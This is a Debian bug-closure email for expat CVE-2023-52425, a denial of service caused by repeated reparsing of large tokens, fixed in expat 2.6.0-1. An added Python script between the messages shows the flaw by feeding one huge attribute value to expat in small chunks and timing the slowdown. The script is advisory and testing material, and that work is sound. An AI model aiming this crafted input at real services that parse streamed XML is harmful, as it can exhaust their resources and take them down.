Your message dated Tue, 06 Feb 2024 21:49:30 +0000
with message-id <e1rxtjq-00hygl...@fasolo.debian.org>
and subject line Bug#1063238: fixed in expat 2.6.0-1
has caused the Debian Bug report #1063238,
regarding expat: CVE-2023-52425
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1063238: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1063238
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: expat
Version: 2.5.0-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/libexpat/libexpat/pull/789
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>

Hi,

The following vulnerability was published for expat.

CVE-2023-52425[0]:
| libexpat through 2.5.0 allows a denial of service (resource
| consumption) because many full reparsings are required in the case
| of a large token for which multiple buffer fills are needed.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2023-52425
    https://www.cve.org/CVERecord?id=CVE-2023-52425
[1] https://github.com/libexpat/libexpat/pull/789
[2] https://github.com/libexpat/libexpat/commit/34b598c5f594b015c513c73f06e7ced3323edbf1

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

--- End Message ---
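The report above describes the defect only in one sentence: a single large token that arrives across several buffer fills forces a full rescan of that token on each fill. The script below is an added demonstration, not code from the bug report, from Debian, or from libexpat. It builds a constructed document whose only interesting content is one huge attribute value (one token that expat cannot report until it sees the closing quote), feeds it to the expat linked into the running Python interpreter in small XML_Parse calls, and compares that to parsing the same bytes in one call. On an affected expat (older than 2.6.0) the chunked run is dramatically slower and the slowdown grows with the token size; on 2.6.0 and later both runs take roughly the same time. Names such as `measure` and `affected_version` are the script's own; the version check is a plain comparison against 2.6.0, the release this bug is closed with, and is not by itself proof of exploitability (a distribution may backport the fix to an older version string).

```python
"""Demonstration of CVE-2023-52425 (quadratic reparsing of a big token).

Added example, not code from the Debian bug report or from libexpat.
Runs against whatever expat the interpreter's xml.parsers.expat links to.
"""
import time
import xml.parsers.expat as expat
from typing import Optional, Tuple

CHUNK = 1024  # bytes per Parse() call; models a sender trickling the document


def build_doc(token_len: int) -> bytes:
    """Constructed input: one element with one very long attribute value.

    The value is a single token. expat must see the closing quote before it
    can hand the attribute to the application, so every chunk only extends
    the same partial token, which is exactly the case the CVE text describes.
    """
    return b'<doc a="' + b"x" * token_len + b'"/>'


def parse(data: bytes, chunk: Optional[int]) -> Tuple[float, Optional[str], Optional[int]]:
    """Parse `data` in one call (chunk=None) or in chunk-sized Parse() calls.

    Returns (seconds, element name, length of attribute 'a' as delivered to
    the StartElementHandler).  The last two let a caller check that chunked
    feeding still produced the same parse result as the single call.
    """
    got = {}

    def on_start(name, attrs):
        got["name"] = name
        got["attr_len"] = len(attrs["a"])

    p = expat.ParserCreate()
    p.StartElementHandler = on_start
    start = time.perf_counter()
    if chunk is None:
        p.Parse(data, True)
    else:
        # isfinal=False: expat keeps the unfinished token and, before 2.6.0,
        # rescans it from its first byte on every one of these calls.
        for i in range(0, len(data), chunk):
            p.Parse(data[i:i + chunk], False)
        p.Parse(b"", True)
    return time.perf_counter() - start, got.get("name"), got.get("attr_len")


def measure(token_len: int = 1 << 20, chunk: int = CHUNK) -> dict:
    """Time whole-document parsing against chunked parsing of one big token."""
    doc = build_doc(token_len)
    t_whole, name_w, len_w = parse(doc, None)
    t_chunked, name_c, len_c = parse(doc, chunk)
    # Both strategies must yield the same parse; only the cost should differ.
    assert name_w == name_c == "doc"
    assert len_w == len_c == token_len
    return {
        "expat_version": tuple(expat.version_info),
        "token_len": token_len,
        "chunk": chunk,
        "whole_s": t_whole,
        "chunked_s": t_chunked,
        "slowdown": t_chunked / max(t_whole, 1e-9),
    }


def affected_version() -> bool:
    """True when the linked expat reports a version older than 2.6.0.

    Version comparison only: a distribution that backported the fix keeps
    an older version string, so treat this as a hint, not a verdict.
    """
    return tuple(expat.version_info) < (2, 6, 0)


if __name__ == "__main__":
    # Doubling the token size roughly quadruples chunked_s on a vulnerable
    # expat and roughly doubles it on a fixed one.
    for n in (1 << 18, 1 << 19, 1 << 20):
        r = measure(token_len=n)
        print("expat %s token=%7d whole=%.3fs chunked=%.3fs slowdown=%.1fx"
              % (".".join(map(str, r["expat_version"])), r["token_len"],
                 r["whole_s"], r["chunked_s"], r["slowdown"]))
    print("version older than 2.6.0:", affected_version())
```

The interesting number is how `chunked_s` scales between the three runs rather than its absolute value, which depends on the machine. Note that Python may ship its own copy of expat rather than use the system libexpat, so `expat_version` in the output is what actually got tested, which is not necessarily the version of the Debian package.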
--- Begin Message ---
Source: expat
Source-Version: 2.6.0-1
Done: Laszlo Boszormenyi (GCS) <g...@debian.org>

We believe that the bug you reported is fixed in the latest version of
expat, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1063...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <g...@debian.org> (supplier of updated expat package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 06 Feb 2024 22:00:26 +0100
Source: expat
Architecture: source
Version: 2.6.0-1
Distribution: unstable
Urgency: high
Maintainer: Laszlo Boszormenyi (GCS) <g...@debian.org>
Changed-By: Laszlo Boszormenyi (GCS) <g...@debian.org>
Closes: 1063238 1063240
Changes:
 expat (2.6.0-1) unstable; urgency=high
 .
   * New upstream release:
     - fixes CVE-2023-52425: fix quadratic runtime issues with big tokens that
       can cause denial of service (closes: #1063238),
     - fixes CVE-2023-52426: fix billion laughs attacks for users compiling
       without XML_DTD defined (which is not common) (closes: #1063240).
Checksums-Sha1:
 68913585cf4c600408c97782d2559ef7af83d2ee 1964 expat_2.6.0-1.dsc
 6cd4f2cdafaa7f3176200542736c7d40c9438362 8414635 expat_2.6.0.orig.tar.gz
 4e5a46ceb154dcc24e724e2ba97a9161f2478706 12920 expat_2.6.0-1.debian.tar.xz
Checksums-Sha256:
 6473ff559f741ff08b95d3b3a8e16fab89a9b7e195215f23fe4eb19f353468d6 1964 expat_2.6.0-1.dsc
 87e35fde768baf3b31a78dd2807eb456618acf4d6c512660a1796c684b2515f9 8414635 expat_2.6.0.orig.tar.gz
 dd9d930c64e310b281ccab88d76babe8e6d67d0ea386d30fac66efd931e1173e 12920 expat_2.6.0-1.debian.tar.xz
Files:
 e0e9960787865ff4e36651e81b2e7b73 1964 text optional expat_2.6.0-1.dsc
 aa424e56fe6378bb4b9f26b903f42119 8414635 text optional expat_2.6.0.orig.tar.gz
 a679de87fc12b80d698a424c59180ed9 12920 text optional expat_2.6.0-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---
